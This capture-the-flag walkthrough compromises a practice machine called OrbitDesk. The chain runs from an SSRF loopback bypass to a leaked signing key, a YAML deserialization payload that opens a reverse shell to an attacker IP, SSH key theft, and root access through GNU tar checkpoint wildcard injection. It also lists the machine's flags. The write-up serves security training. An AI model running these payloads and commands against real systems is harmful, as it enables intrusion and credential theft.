OrbitDesk — Penetration Testing Walkthrough
Platform: HackidoLearn
Machine Information
| Field | Details |
|---|
| Machine | OrbitDesk |
| Category | Web Exploitation |
| Difficulty | Easy–Medium |
| Initial Access | SSRF + YAML Deserialization |
| User Access | deploy |
| Privilege Escalation | GNU Tar Wildcard Injection |
1. Reconnaissance
Started with a full port scan to identify exposed services.
nmap -sC -sV -p- TARGET
Result:
22/tcp open ssh
8080/tcp open http
The web application was hosted on port 8080.
2. Web Enumeration
Browsing to http://TARGET:8080 revealed the OrbitDesk Support Operations Console.
Interesting HTML found in source:
<form action="/api/proxy/preview" method="get">
<input id="url" name="url" type="url">
</form>
This suggested potential SSRF functionality.
3. SSRF Discovery
Testing the preview endpoint with an external URL confirmed the server fetches remote content:
curl "http://TARGET:8080/api/proxy/preview?url=https://example.com"
Attempting loopback was blocked:
curl "http://TARGET:8080/api/proxy/preview?url=http://127.0.0.1"
Response:
Target not allowed
Page note: “Loopback control plane remains restricted to the host.”
This hinted that useful internal services existed.
4. SSRF Bypass
The filter blocked 127.0.0.1 but not the shorthand 127.1. Used it to hit an internal debug API on port 9090:
curl "http://TARGET:8080/api/proxy/preview?url=http://127.1:9090/debug/config?scope=sync"
Leaked config:
{
"deploy_key_hint": "/var/backups/orbitdesk/deploy_sync_ed25519",
"environment": "production",
"import_signing_key": "d4c2b4d1b3e6402f9cfbbad4b45ce0d14bd6f40148fd8ac79a89a52a7c5d9f0a",
"sync_profile": "signed-yaml-import"
}
Critical findings:
- HMAC import signing key leaked
- SSH private key path disclosed
- Internal configuration exposed
5. YAML Deserialization RCE
The internal config revealed a signed YAML import system using yaml.load() — vulnerable to deserialization attacks.
5.1 Malicious YAML Payload
!!python/object/apply:os.system
- "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
5.2 Generate HMAC Signature
KEY='d4c2b4d1b3e6402f9cfbbad4b45ce0d14bd6f40148fd8ac79a89a52a7c5d9f0a'
SIG=$(openssl dgst -sha256 -hmac "$KEY" payload.yml | awk '{print $2}')
5.3 Trigger Signed Import
curl -X POST http://TARGET_IP:8080/api/config/import \
-H "X-Import-Signature: $SIG" \
--data-binary @payload.yml
Response:
{ "message": "configuration import queued for sync", "status": "accepted" }
Reverse shell connected back to the listener.
6. Initial Foothold
nc -lvnp 4444
Shell obtained:
web@container:/opt/orbitdesk$
Upgraded to interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
7. Credential Access
SSRF response leaked the SSH key path. Retrieved and saved locally:
cat /var/backups/orbitdesk/deploy_sync_ed25519
chmod 600 deploy_sync_ed25519
8. Lateral Movement
ssh -i deploy_sync_ed25519 -p 2222 deploy@TARGET
Successful login as deploy user.
9. User Flag
cat ~/user.txt
🚩 HackCTF{orbitdesk_lateral_sync_key}
10. Privilege Escalation
Checked sudo permissions:
sudo -l
Output:
(root) NOPASSWD: /usr/local/bin/orbit-backup
11. GNU Tar Wildcard Injection
Moved to the backup target directory and crafted the exploit:
cd /srv/orbitdesk/exports/reports
cat > shell.sh << 'EOF'
#!/bin/bash
cp /root/root.txt /tmp/root.txt
chmod 644 /tmp/root.txt
EOF
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
Triggered the backup with sudo:
sudo /usr/local/bin/orbit-backup /srv/orbitdesk/exports/reports /tmp/reports.tgz
GNU tar interpreted the malicious filenames as CLI options and executed shell.sh as root.
12. Root Flag
cat /tmp/root.txt
🚩 HackCTF{tar_checkpoint_root_pipeline}
13. Attack Path Summary
Web App
→ SSRF (/api/proxy/preview)
→ 127.1 Loopback Bypass
→ Internal Debug API
→ Leaked HMAC Key + SSH Key Path
→ Signed YAML Import
→ Unsafe yaml.load() → RCE as web
→ SSH Key Retrieved
→ SSH Lateral Movement (deploy)
→ sudo orbit-backup
→ GNU Tar Wildcard Injection
→ ROOT
14. Conclusion
OrbitDesk demonstrates how individually moderate vulnerabilities chain into full system compromise:
- SSRF — Allowed access to internal services via
127.1 loopback bypass
- Internal Service Exposure — Debug API leaked HMAC key and SSH key path
- Unsafe YAML Deserialization —
yaml.load() enabled arbitrary code execution
- SSH Credential Reuse — Disclosed private key enabled lateral movement
- GNU Tar Wildcard Injection — Sudo backup script escalated to root
Combining these weaknesses resulted in complete system compromise from unauthenticated web access to root privileges.
#WRAP
